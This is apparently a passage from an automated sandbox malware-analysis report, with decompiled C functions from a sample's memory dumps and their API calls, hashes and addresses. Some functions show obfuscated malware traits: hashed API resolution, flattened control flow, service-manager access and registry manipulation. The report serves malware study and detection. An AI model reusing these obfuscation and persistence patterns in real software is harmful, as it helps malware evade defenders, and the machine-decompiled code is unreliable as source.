											} else {
												_t29 = _t29 + (_v320 & 0x0000ffff);
											}
										}
									}
								}
							}
						}
						L9:
						return _t29;
					}
					_t8 = 0x1c5820e2;
					L16:
				} while (_t8 != 0x30345473);
				goto L9;
			}

0x02303b54
0x02303b5d
0x02303b6e
0x02303b6e
0x02303b7e
0x02303c3b
0x02303c3d
0x00000000
0x02303b84
0x02303b86
0x02303c2a
0x02303c2c
0x00000000
0x02303b8c
0x02303b8e
0x02303bfb
0x02303c03
0x02303c19
0x02303c1b
0x00000000
0x02303b90
0x02303b95
0x02303bda
0x02303beb
0x02303bed
0x00000000
0x02303b97
0x02303b9c
0x02303bc8
0x02303bca
0x00000000
0x02303b9e
0x02303ba0
0x00000000
0x02303ba6
0x02303bab
0x02303bab
0x02303ba0
0x02303b9c
0x02303b95
0x02303b8e
0x02303b86
0x02303bae
0x02303bb9
0x02303bb9
0x02303c44
0x02303c46
0x02303c46
0x00000000

APIs

GetNativeSystemInfo.KERNELBASE(?,?,2895FB0B,?,?), ref: 02303BEB

Strings

^P , xrefs: 02303B97
sT40, xrefs: 02303C46
^P , xrefs: 02303BED

Memory Dump Source

Source File: 00000003.00000002.615127704.0000000002301000.00000020.00000001.sdmp, Offset: 02300000, based on PE: true

Associated: 00000003.00000002.615121787.0000000002300000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.615142665.0000000002309000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2300000_dot3hc.jbxd

Similarity

API ID: InfoNativeSystem
String ID: sT40$^P $^P
API String ID: 1721193555-826379165
Opcode ID: 1bfbde6b4ed4b2435eebdf135c5f5d12d38efa86e7b6a1fd41a50dec05332954
Instruction ID: 1d7df8740b9e144d523fee5e5309b2126c97b7b0b78be710a3be066d0d7104d3
Opcode Fuzzy Hash: 1bfbde6b4ed4b2435eebdf135c5f5d12d38efa86e7b6a1fd41a50dec05332954
Instruction Fuzzy Hash: 47115B657083115BC778E91E8DE527EA5CCD784248F9808BBF985CB7D1DA2AC98483B3

Uniqueness

Uniqueness Score: -1.00%

Function 00403A3A, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 69
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403A3A(intOrPtr __ecx) {
				void* _v8;
				char _v12;
				int _v16;
				intOrPtr _v20;
				int _v24;
				long _t29;
				char* _t30;
				intOrPtr _t32;
				char** _t34;
				signed int _t39;
				char** _t43;
				char* _t45;

				 *((intOrPtr*)(__ecx + 0xa0)) = 0;
				_t45 =  *0x44251c; // 0x435040
				_v20 = __ecx;
				_v8 = 0;
				_v12 = 0;
				_v24 = 4;
				_v16 = 0;
				_t34 = 0x44251c;
				if(_t45 == 0) {
					L14:
					return 1;
				}
				do {
					_t29 = RegOpenKeyExA(0x80000001,  *_t34, 0, 1,  &_v8); // executed
					if(_t29 != 0) {
						goto L12;
					}
					_t43 = _t34[1];
					while(1) {
						_t30 =  *_t43;
						if(_t30 == 0) {
							break;
						}
						if(RegQueryValueExA(_v8, _t30, 0,  &_v16,  &_v12,  &_v24) == 0 && _v16 == 4) {
							_t39 = _t43[1];
							_t32 = _v20;
							if(_v12 == 0) {
								 *(_t32 + 0xa0) =  *(_t32 + 0xa0) &  !_t39;
							} else {
								 *(_t32 + 0xa0) =  *(_t32 + 0xa0) | _t39;
							}
						}
						_v12 = 0;
						_v24 = 4;
						_v16 = 0;
						_t43 =  &(_t43[2]);
					}
					RegCloseKey(_v8);
					_v8 = 0;
					L12:
					_t34 =  &(_t34[2]);
				} while ( *_t34 != 0);
				goto L14;
			}

APIs

RegOpenKeyExA.KERNELBASE(80000001,@PC,00000000,00000001,?), ref: 00403A7D
RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,?,00000004), ref: 00403A9D
RegCloseKey.ADVAPI32(?), ref: 00403AE1

Strings

@PC, xrefs: 00403A4A, 00403A63, 00403A76

Memory Dump Source

Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: @PC
API String ID: 3677997916-3669301676
Opcode ID: 7e3950ef7bce093945acdd9d3cc986913b746b0efde1205527eef0e1a10a9443
Instruction ID: ba0bfb9c3578450b4f1f1542634a8380ad0c35d974bf2591f2b7a0502db76563
Opcode Fuzzy Hash: 7e3950ef7bce093945acdd9d3cc986913b746b0efde1205527eef0e1a10a9443
Instruction Fuzzy Hash: CF2107B1E10208EFDB15CF85D944AAEBBB8FF91706F1440AAE591B6290D3795B00CF25

Uniqueness

Uniqueness Score: -1.00%

Function 023067ED, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 142
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E023067ED() {
				char _v524;
				void* _v528;
				char _v536;
				void* _v544;
				void* _t11;
				intOrPtr _t12;
				intOrPtr _t21;
				void* _t23;
				intOrPtr _t24;
				intOrPtr _t28;
				intOrPtr _t29;
				void* _t33;
				void* _t34;
				intOrPtr _t43;
				intOrPtr _t48;
				void* _t60;
				short* _t61;
				void* _t64;

				_t34 = _v528;
				_t11 = 0x2b1f137a;
				_t61 = 0;
				goto L1;
				do {
					while(1) {
						L1:
						_t64 = _t11 - 0x22afb69c;
						if(_t64 > 0) {
							break;
						}
						if(_t64 == 0) {
							_t21 =  *0x230a4c4; // 0x5b4dc8
							_t60 = 0x1c;
							 *((intOrPtr*)(_t21 + 0x250)) = 0x2305793;
							L14:
							_t11 = 0x9076f63;
							continue;
						}
						if(_t11 == 0x502f5b) {
							E02302F84(0x4836b0ed, 0x7fd8698, 0x1c5);
							_t23 = OpenSCManagerW(0, 0, 0xf003f); // executed
							_t34 = _t23;
							if(_t34 == 0) {
								_t11 = 0x22afb69c;
							} else {
								_t24 =  *0x230a4c4; // 0x5b4dc8
								 *((intOrPtr*)(_t24 + 0x264)) = 1;
								_t11 = 0x4ef3871;
							}
							continue;
						}
						if(_t11 == 0xa04584) {
							_push(0x104);
							_push( &_v524);
							_push(0);
							 *((intOrPtr*)(E02302F84(0xf568ce83, 0x738e43f2, 0x169)))();
							_t28 = E02302C80( &_v536);
							_t43 =  *0x230a4c4; // 0x5b4dc8
							 *((intOrPtr*)(_t43 + 0x268)) = _t28;
							_t11 = 0x34cf5423;
							continue;
						}
						if(_t11 == 0x4ef3871) {
							_t60 = 0x29;
							_t11 = 0x2edd9354;
							continue;
						}
						if(_t11 != 0x9076f63) {
							goto L26;
						}
						_t29 =  *0x230a4c4; // 0x5b4dc8
						_push(_t29 + 0x26c);
						_push(0);
						_push(0);
						_push(_t60);
						_push(0);
						 *((intOrPtr*)(E02302F84(0xb7924d94, 0x1a51d89f, 0x269)))(); // executed
						_t33 = 1;
						_t61 =  ==  ? _t33 : _t61;
						_t11 = 0x33b48501;
					}
					if(_t11 == 0x2b1f137a) {
						_t12 = E02303037(0x478);
						 *0x230a4c4 = _t12;
						if(_t12 == 0) {
							_t11 = 0x3b5a6d9f;
							goto L26;
						}
						 *((intOrPtr*)(_t12 + 0x24c)) = E02305798;
						_t11 = 0x502f5b;
						goto L1;
					}
					if(_t11 == 0x2edd9354) {
						_push(_t34);
						 *((intOrPtr*)(E02302F84(0x4836b0ed, 0x28c81fb9, 0x11c)))();
						goto L14;
					}
					if(_t11 == 0x33b48501) {
						E02305667();
						_t11 = 0xa04584;
						goto L1;
					}
					if(_t11 != 0x34cf5423) {
						goto L26;
					}
					_push( &_v524);
					_push(0);
					_push(0);
					_push(0x25);
					_push(0);
					 *((intOrPtr*)(E02302F84(0xb7924d94, 0x1a51d89f, 0x269)))();
					_t48 =  *0x230a4c4; // 0x5b4dc8
					E02302473(_t48 + 0x228);
					L20:
					return _t61;
					L26:
				} while (_t11 != 0x3b5a6d9f);
				goto L20;
			}

0x023067f4
0x023067f8
0x02306806
0x02306806
0x02306808
0x02306808
0x02306808
0x02306808
0x0230680d
0x00000000
0x00000000
0x02306813
0x02306903
0x0230690a
0x0230690b
0x02306915
0x02306915
0x00000000
0x02306915
0x0230681e
0x023068d3
0x023068d9
0x023068db
0x023068df
0x023068f9
0x023068e1
0x023068e1
0x023068e9
0x023068ef
0x023068ef
0x00000000
0x023068df
0x02306829
0x0230687c
0x0230688a
0x0230688b
0x0230689c
0x023068a2
0x023068a7
0x023068ad
0x023068b3
0x00000000
0x023068b3
0x02306830
0x02306874
0x02306875
0x00000000
0x02306875
0x02306837
0x00000000
0x00000000
0x0230683d
0x02306851
0x02306852
0x02306853
0x02306854
0x02306855
0x02306861
0x02306867
0x02306868
0x0230686b
0x0230686b
0x02306924
0x023069b9
0x023069be
0x023069c5
0x023069db
0x00000000
0x023069db
0x023069c7
0x023069d1
0x00000000
0x023069d1
0x0230692f
0x02306997
0x023069ad
0x00000000
0x023069ad
0x02306936
0x02306988
0x0230698d
0x00000000
0x0230698d
0x0230693d
0x00000000
0x00000000
0x0230694c
0x0230694d
0x0230694e
0x0230694f
0x02306951
0x02306962
0x02306964
0x02306975
0x0230697c
0x02306987
0x023069e0
0x023069e0
0x00000000

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F,?,2895FB0B,?,?), ref: 023068D9

Strings

[/P, xrefs: 023069D1
[/P, xrefs: 02306819

Memory Dump Source

Source File: 00000003.00000002.615127704.0000000002301000.00000020.00000001.sdmp, Offset: 02300000, based on PE: true

Associated: 00000003.00000002.615121787.0000000002300000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.615142665.0000000002309000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2300000_dot3hc.jbxd

Similarity

API ID: ManagerOpen
String ID: [/P$[/P
API String ID: 1889721586-1150913210
Opcode ID: 84f37c1f94b1bb65848f54585d75d6298ad84104553592fb2425b5058b72fe0c
Instruction ID: 14c9b12b37d51c9e73d57134d4811136dd44a7a5c5c3d0ec8ca671c17a708325
Opcode Fuzzy Hash: 84f37c1f94b1bb65848f54585d75d6298ad84104553592fb2425b5058b72fe0c
Instruction Fuzzy Hash: 6041AEB17483056BE66C5618DCFEA3A36ADD740348F14082BFA05DB7C9CA26E8618F31

Uniqueness

Uniqueness Score: -1.00%

Function 0040B748, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28
threadCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E0040B748(void* __edi, void* __eflags) {
				intOrPtr _v0;
				void* __esi;
				struct HHOOK__* _t6;
				void* _t8;
				void* _t10;
				intOrPtr _t11;
				void* _t13;
				struct HHOOK__* _t14;

				_t10 = __edi;
				_push(0x4037fd);
				_t6 = E0040F584(_t8, 0x44642c, __edi, _t13, __eflags);
				_t14 = _t6;
				_t16 = _t14;
				if(_t14 == 0) {
					_t6 = E004037E3(_t8, 0x44642c, __edi, _t14, _t16);
				}
				_push(_t10);
				_t11 = _v0;
				if( *((intOrPtr*)(_t14 + 0x14)) != _t11) {
					if( *(_t14 + 0x28) == 0) {
						_t6 = SetWindowsHookExA(5, E0040B4F5, 0, GetCurrentThreadId()); // executed
						_t19 = _t6;
						 *(_t14 + 0x28) = _t6;
						if(_t6 == 0) {
							_t6 = E004037AF(_t8, 0x44642c, _t11, _t14, _t19);
						}
					}
					 *((intOrPtr*)(_t14 + 0x14)) = _t11;
				}
				return _t6;
			}

APIs

Part of subcall function 0040F584: __EH_prolog3.LIBCMT ref: 0040F58B

GetCurrentThreadId.KERNEL32 ref: 0040B773
SetWindowsHookExA.USER32 ref: 0040B783

Part of subcall function 004037E3: __CxxThrowException@8.LIBCMT ref: 004037F7
Part of subcall function 004037E3: __EH_prolog3.LIBCMT ref: 00403804

Strings

,dD, xrefs: 0040B74E

Memory Dump Source

Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd

Similarity

API ID: H_prolog3$CurrentException@8HookThreadThrowWindows
String ID: ,dD
API String ID: 1415497866-3191229884
Opcode ID: 8f866669248ae714854411d0b957cdf2ed001e559e2ffdcb1c22fb3dcb3eb344
Instruction ID: f4f6cd2454f4fa9c59ed38751070ba4084f81d528619c841e15a486b9898b3b2
Opcode Fuzzy Hash: 8f866669248ae714854411d0b957cdf2ed001e559e2ffdcb1c22fb3dcb3eb344
Instruction Fuzzy Hash: 06F0A7B55007115AD7306F16980571BB698DBE4762F11463FF501B72D0D738E94186AE

Uniqueness

Uniqueness Score: -1.00%

Function 022D002D, Relevance: 4.9, APIs: 3, Instructions: 387memoryCOMMON

Download Yara Rule

APIs

GetNativeSystemInfo.KERNELBASE(?,?,?,?,022D0005), ref: 022D00E9
VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?,022D0005), ref: 022D0111

Memory Dump Source

Source File: 00000003.00000002.615027778.00000000022D0000.00000040.00000001.sdmp, Offset: 022D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_22d0000_dot3hc.jbxd

Yara matches

Similarity

API ID: AllocInfoNativeSystemVirtual
String ID:
API String ID: 2032221330-0
Opcode ID: 460d81c489b0c162692d77f33f70033fe6d40d0b28a700ce4a73fb1871822586
Instruction ID: 882a6b2587e0209d14c7bba326e2014e7ffa9318bc8a4d412afa859f8c571c67
Opcode Fuzzy Hash: 460d81c489b0c162692d77f33f70033fe6d40d0b28a700ce4a73fb1871822586
Instruction Fuzzy Hash: F0D1F271A183079FD714CFA9C88476AB3E0FF84318F18852DE895CB265E7B4EA45CB91

Uniqueness

Uniqueness Score: -1.00%

Function 004024B0, Relevance: 4.6, APIs: 3, Instructions: 55
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004024B0(intOrPtr __ecx, char* _a4, char* _a8) {
				void* _v8;
				int _v12;
				int* _v16;
				int _v20;
				int _v24;
				intOrPtr _v28;
				long _t24;
				long _t28;
				char* _t39;

				_v28 = __ecx;
				_v8 = 0;
				_v16 = 0;
				_t39 =  *0x442000; // 0x4346d4
				_t24 = RegCreateKeyExA(0x80000002, _t39, 0, 0, 0, 0x2001f, 0,  &_v8,  &_v12); // executed
				_v16 = _t24;
				if(_v16 == 0) {
					_v24 = 4;
					 *_a4 = 1;
					_t28 = RegQueryValueExA(_v8, _a8, 0,  &_v20, _a4,  &_v24); // executed
					_v16 = _t28;
					if(_v16 != 0) {
						_v16 = E00402440(_v28,  *_a4, _a8);
					}
					RegCloseKey(_v8); // executed
				}
				return _v16;
			}

0x004024b6
0x004024b9
0x004024c0
0x004024dc
0x004024e8
0x004024ee
0x004024f5
0x004024f7
0x00402501
0x0040251d
0x00402523
0x0040252a
0x0040253e
0x0040253e
0x00402545
0x00402545
0x00402551

APIs

RegCreateKeyExA.KERNELBASE(80000002,004346D4,00000000,00000000,00000000,0002001F,00000000,00000000,00000000,00401561,00000000,0043463C), ref: 004024E8
RegQueryValueExA.KERNELBASE(00000000,00000000,00000000,?,00000000,00000004), ref: 0040251D
RegCloseKey.KERNELBASE(00000000), ref: 00402545

Part of subcall function 00402440: RegCreateKeyExA.ADVAPI32(80000002,004346D4,00000000,00000000,00000000,0002001F,00000000,00000000,?), ref: 00402471
Part of subcall function 00402440: RegSetValueExA.ADVAPI32(00000000,00000000,00000000,00000004,?,00000004), ref: 00402492
Part of subcall function 00402440: RegCloseKey.ADVAPI32(00000000), ref: 0040249F

Memory Dump Source

Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd

Similarity

API ID: CloseCreateValue$Query
String ID:
API String ID: 4008097885-0
Opcode ID: 4b525abb1b769d0c291595b1a73f4448208f6ca78324013d7001a83c11f5276b
Instruction ID: 165df2290a195cec47e703b39910aa938aa55349580083daa8813ab03a4b17f9
Opcode Fuzzy Hash: 4b525abb1b769d0c291595b1a73f4448208f6ca78324013d7001a83c11f5276b
Instruction Fuzzy Hash: EF11DAB5A00208FFDB04DF94D959FEEB7B8EB48704F108159FA15AB290D774AA44CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 0040A2E8, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 71
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E0040A2E8(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t39;
				intOrPtr _t56;
				signed int _t58;
				signed int _t62;
				intOrPtr _t70;
				signed int _t76;
				void* _t78;
				void* _t82;
				intOrPtr _t83;

				_t82 = __eflags;
				_push(0x38);
				E0041F71D(E004323F0, __ebx, __edi, __esi);
				_push(0x4037fd);
				_t56 = E0040F584(__ebx, 0x44642c, __edi, __esi, _t82);
				_t83 = _t56;
				 *((intOrPtr*)(_t78 - 0x14)) = _t56;
				_t84 = _t83 == 0;
				if(_t83 == 0) {
					E004037E3(_t56, 0x44642c, __edi, __esi, _t84);
				}
				_t4 = _t56 + 0x58; // 0x58
				_t58 = 7;
				_t39 = memcpy(_t78 - 0x44, _t4, _t58 << 2);
				_t70 =  *((intOrPtr*)(_t78 + 0x10));
				_t76 =  *(_t78 + 8);
				 *_t39 =  *(_t78 + 0xc);
				 *((intOrPtr*)(_t56 + 0x60)) =  *((intOrPtr*)(_t78 + 0x14));
				 *((intOrPtr*)(_t56 + 0x5c)) = _t70;
				 *((intOrPtr*)(_t56 + 0x64)) =  *((intOrPtr*)(_t78 + 0x18));
				 *((intOrPtr*)(_t78 - 4)) = 0;
				if(_t70 == 2 &&  *((intOrPtr*)(_t76 + 0x4c)) != 0) {
					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t76 + 0x4c)))) + 0x60))(0);
				}
				 *(_t78 + 8) =  *(_t78 + 8) & 0x00000000;
				if(_t70 == 0x110) {
					E004089E1(_t76, _t78 - 0x28, _t78 + 8);
				}
				 *((intOrPtr*)(_t78 + 0x18)) =  *((intOrPtr*)( *_t76 + 0x108))(_t70,  *((intOrPtr*)(_t78 + 0x14)),  *((intOrPtr*)(_t78 + 0x18)));
				if(_t70 == 0x110) {
					E0040A26C(_t56, 0, _t76, _t78 - 0x28,  *(_t78 + 8));
				}
				_t30 = _t56 + 0x58; // 0x58
				_t62 = 7;
				return E0041F7C2(memcpy(_t30, _t78 - 0x44, _t62 << 2));
			}

APIs

__EH_prolog3_catch.LIBCMT ref: 0040A2EF

Part of subcall function 0040F584: __EH_prolog3.LIBCMT ref: 0040F58B

Part of subcall function 004037E3: __CxxThrowException@8.LIBCMT ref: 004037F7
Part of subcall function 004037E3: __EH_prolog3.LIBCMT ref: 00403804

Strings

,dD, xrefs: 0040A2F9

Memory Dump Source

Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd

Similarity

API ID: H_prolog3$Exception@8H_prolog3_catchThrow
String ID: ,dD
API String ID: 24280941-3191229884
Opcode ID: 65ee8d3f11b7dbb7a713a4002fd51a6a596b8f460aab63a27ca7ea3c2e120f50
Instruction ID: aadd303bf69657f6d7fcf57e1872b0adf1e10777afe3b3ca5e8b26921ca13ed5
Opcode Fuzzy Hash: 65ee8d3f11b7dbb7a713a4002fd51a6a596b8f460aab63a27ca7ea3c2e120f50
Instruction Fuzzy Hash: 93214A72A00209DFCF15DF65C4819EE7BA6EF48314F11807AFD05AB281D738EA95CB95

Uniqueness

Uniqueness Score: -1.00%

Function 004011D0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E004011D0(void* __ebx, intOrPtr __ecx, void* __edx, void* __edi, void* __esi) {
				intOrPtr _v8;
				char _v16;
				intOrPtr _v20;
				char _v336;
				intOrPtr _v340;
				intOrPtr _v352;
				void* __ebp;
				signed int _t18;
				intOrPtr _t26;
				signed int _t42;

				_t39 = __edx;
				_t18 =  *0x443590; // 0x8ffedb05
				 *[fs:0x0] =  &_v16;
				_v352 = __ecx;
				__imp__#17(_t18 ^ _t42,  *[fs:0x0], E00431A3B, 0xffffffff);
				E00404019(_v352);
				E00407105(__ebx, __edi, 0);
				E00406622(__ebx, _v352, __edx, __edi, _t42, "Local AppWizard-Generated Applications");
				E00401450(__ebx,  &_v336, __edi, __esi, _t18 ^ _t42, 0); // executed
				_v8 = 0;
				 *((intOrPtr*)(_v352 + 0x20)) =  &_v336;
				_t26 = E0040638F(__ebx,  &_v336, _t39, __edi, __esi, _t18 ^ _t42); // executed
				_v20 = _t26;
				_v340 = 0;
				_v8 = 0xffffffff;
				E00401290( &_v336, _t18 ^ _t42);
				 *[fs:0x0] = _v16;
				return _v340;
			}

0x004011d0
0x004011e7
0x004011f2
0x004011f8
0x004011fe
0x0040120a
0x00401211
0x00401224
0x00401231
0x00401236
0x00401249
0x00401252
0x00401257
0x0040125a
0x00401264
0x00401271
0x0040127f
0x0040128a

APIs

#17.COMCTL32(8FFEDB05), ref: 004011FE

Part of subcall function 00404019: InterlockedExchange.KERNEL32(00447344,?), ref: 00404045

Part of subcall function 00406622: __strdup.LIBCMT ref: 00406631
Part of subcall function 00406622: __strdup.LIBCMT ref: 00406644

Part of subcall function 0040638F: __EH_prolog3_catch.LIBCMT ref: 00406396
Part of subcall function 0040638F: FindResourceA.KERNEL32(?,?,00000005), ref: 004063C9
Part of subcall function 0040638F: LoadResource.KERNEL32(?,00000000), ref: 004063D1
Part of subcall function 0040638F: LockResource.KERNEL32(?,00000024,00401257,00000000,Local AppWizard-Generated Applications), ref: 004063E2

Part of subcall function 00401290: ~_Task_impl.LIBCPMT ref: 004012E4
Part of subcall function 00401290: ~_Task_impl.LIBCPMT ref: 004012F3

Strings

Local AppWizard-Generated Applications, xrefs: 00401219

Memory Dump Source

Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd

Similarity

API ID: Resource$Task_impl__strdup$ExchangeFindH_prolog3_catchInterlockedLoadLock
String ID: Local AppWizard-Generated Applications
API String ID: 2756291502-3869840320
Opcode ID: 4b652bab73451f1050d75de3ea63c1c9252032420ff5dbcae01f9af74fd20209
Instruction ID: 0db303b2012f99e3f1afa8417c8b10c21545059f69079e666712292cf1c3cdd3
Opcode Fuzzy Hash: 4b652bab73451f1050d75de3ea63c1c9252032420ff5dbcae01f9af74fd20209
Instruction Fuzzy Hash: 06114870900618DBCB24EF54DC55BD9B7B4EB49715F1042AAE41A6B3E0DB382A04CF88

Uniqueness

Uniqueness Score: -1.00%

Function 02303037, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 19
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E02303037(long __ecx) {
				void* _t2;
				void* _t4;
				long _t12;

				_t12 = __ecx;
				_t2 =  *((intOrPtr*)(E02302F84(0xf568ce83, 0x71eb2479, 0x14d)))();
				E02302F84(0xf568ce83, 0x91b79ad5, 0x51);
				_t4 = RtlAllocateHeap(_t2, 8, _t12); // executed
				return _t4;
			}

0x02303038
0x0230304f
0x02303061
0x02303067
0x0230306a

APIs

RtlAllocateHeap.NTDLL(00000000,00000008,684DEBFF), ref: 02303067

Strings

y$q, xrefs: 0230303A

Memory Dump Source

Source File: 00000003.00000002.615127704.0000000002301000.00000020.00000001.sdmp, Offset: 02300000, based on PE: true

Associated: 00000003.00000002.615121787.0000000002300000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.615142665.0000000002309000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2300000_dot3hc.jbxd

Similarity

API ID: AllocateHeap
String ID: y$q
API String ID: 1279760036-2681802098
Opcode ID: 4966834b75a3f6c8a8251f9f15d84a0979329aaf495d3badf05bfcb5eb52674e
Instruction ID: daa8697718e15c35165d111c6204b34745644fa265be258d9a84bde3902a7215
Opcode Fuzzy Hash: 4966834b75a3f6c8a8251f9f15d84a0979329aaf495d3badf05bfcb5eb52674e
Instruction Fuzzy Hash: F0D0C7212C532266F43C35B43C19FA70116DF99762F1481057E385F1D4CE968C418670

Uniqueness

Uniqueness Score: -1.00%

Function 02302FDF, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 19
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E02302FDF(void* __ecx) {
				void* _t2;
				char _t4;
				void* _t12;

				_t12 = __ecx;
				_t2 =  *((intOrPtr*)(E02302F84(0xf568ce83, 0x71eb2479, 0x14d)))();
				E02302F84(0xf568ce83, 0x5e575f04, 0x1e3);
				_t4 = RtlFreeHeap(_t2, 0, _t12); // executed
				return _t4;
			}

0x02302fe0
0x02302ff7
0x0230300c
0x02303012
0x02303015

APIs

RtlFreeHeap.NTDLL(00000000,00000000,005B4C50), ref: 02303012

Strings

y$q, xrefs: 02302FE2

Memory Dump Source

Source File: 00000003.00000002.615127704.0000000002301000.00000020.00000001.sdmp, Offset: 02300000, based on PE: true

Associated: 00000003.00000002.615121787.0000000002300000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.615142665.0000000002309000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2300000_dot3hc.jbxd

Similarity

API ID: FreeHeap
String ID: y$q
API String ID: 3298025750-2681802098
Opcode ID: 9e7cfeceb0dec80f1ef144627e1224b4ffcf3a69d04874adef1879a8780ab463
Instruction ID: 0bd4b27e6223ee78ce519038ba953492c01bd3f1097015d07ecb560d74983d2d
Opcode Fuzzy Hash: 9e7cfeceb0dec80f1ef144627e1224b4ffcf3a69d04874adef1879a8780ab463
Instruction Fuzzy Hash: B4D0C9716882626BF43831B43C29FAB015ACF997A1F28810A7E649F2C4CF958D52C2A1

Uniqueness

Uniqueness Score: -1.00%

Function 02306B8A, Relevance: 3.1, APIs: 2, Instructions: 76
stringCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E02306B8A() {
				short _v520;
				short _v1040;
				char _v1044;
				void* _t7;
				void* _t38;

				_t38 = 0;
				_t7 = 0x1bd2fc4;
				do {
					while(_t7 != 0x1bd2fc4) {
						if(_t7 == 0x5094b24) {
							_v1044 = 0x104;
							_push( &_v1044);
							_push( &_v1040);
							_push(_t38);
							_push( *((intOrPtr*)(E02302F84(0xf568ce83, 0x5bc29570, 0x42)))());
							 *((intOrPtr*)(E02302F84(0xf568ce83, 0xa87adc75, 0xf3)))(); // executed
							_t7 = 0x11b4854a;
							continue;
						} else {
							if(_t7 == 0x11b4854a) {
								E02302F84(0xf568ce83, 0xb3bb28d3, 0x1f5);
								lstrcmpiW( &_v520,  &_v1040); // executed
								_t38 =  !=  ? 1 : _t38;
							} else {
								if(_t7 != 0x2c2c1f14) {
									goto L8;
								} else {
									_push(0x104);
									_push( &_v520);
									_push(_t38);
									 *((intOrPtr*)(E02302F84(0xf568ce83, 0x738e43f2, 0x169)))();
									_t7 = 0x5094b24;
									continue;
								}
							}
						}
						L11:
						return _t38;
					}
					_t7 = 0x2c2c1f14;
					L8:
				} while (_t7 != 0x33f64f2f);
				goto L11;
			}

0x02306b98
0x02306b9b
0x02306ba7
0x02306ba7
0x02306bb0
0x02306bea
0x02306bf2
0x02306bfc
0x02306bfd
0x02306c0a
0x02306c1d
0x02306c1f
0x00000000
0x02306bb2
0x02306bb7
0x02306c4e
0x02306c54
0x02306c5b
0x02306bb9
0x02306bbb
0x00000000
0x02306bbd
0x02306bbd
0x02306bce
0x02306bcf
0x02306bdd
0x02306bdf
0x00000000
0x02306bdf
0x02306bbb
0x02306bb7
0x02306c5f
0x02306c6a
